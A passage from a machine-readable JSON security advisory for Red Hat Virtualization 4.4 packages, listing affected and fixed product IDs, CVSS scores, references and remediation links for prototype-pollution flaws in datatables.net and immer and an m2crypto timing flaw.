"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "m2crypto: bleichenbacher timing attacks in the RSA decryption API"
},
{
"cve": "CVE-2020-28458",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2020-12-16T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1908441"
}
],
"notes": [
{
"category": "description",
"text": "All versions of package datatables.net are vulnerable to Prototype Pollution due to an incomplete fix for https://snyk.io/vuln/SNYK-JS-DATATABLESNET-598806.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "datatables.net: prototype pollution if \u0027constructor\u0027 were used in a data property name",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "OpenShift console container does package a vulnerable version of datatables.net, however as access to the vulnerable component is restricted via OpenShift OAuth the vulnerability is rated with an impact of `Low`.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"known_not_affected": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-28458"
},
{
"category": "external",
"summary": "RHBZ#1908441",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1908441"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-28458",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28458"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28458",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28458"
},
{
"category": "external",
"summary": "https://snyk.io/vuln/SNYK-JS-DATATABLESNET-1016402",
"url": "https://snyk.io/vuln/SNYK-JS-DATATABLESNET-1016402"
}
],
"release_date": "2020-10-25T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-04-14T16:34:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891",
"product_ids": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "datatables.net: prototype pollution if \u0027constructor\u0027 were used in a data property name"
},
{
"cve": "CVE-2020-28477",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2021-01-20T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1918162"
}
],
"notes": [
{
"category": "description",
"text": "This affects all versions of package immer.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "nodejs-immer: prototype pollution may lead to DoS or remote code execution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Virtualization includes affected version of nodejs-immer, however the usage does not meet the conditions required to exploit the flaw, therefore the impact is Low.\n\nIn OpenShift Container Platform 4.6 (OCP) the openshift4/ose-prometheus container ships the vulnerable version of the nodejs-immer, however the Prometheus react-ui is disabled, hence this flaw cannot be exploited. As openshift4/ose-prometheus container still packages the vulnerable code, this component is affected with impact Low. This may be fixed in a future release.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"known_not_affected": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-28477"
},
{
"category": "external",
"summary": "RHBZ#1918162",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1918162"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-28477",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28477"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28477",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28477"
},
{
"category": "external",
"summary": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369",
"url": "https://snyk.io/vuln/SNYK-JS-IMMER-1019369"
}
],
"release_date": "2021-01-19T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-04-14T16:34:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891",
"product_ids": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
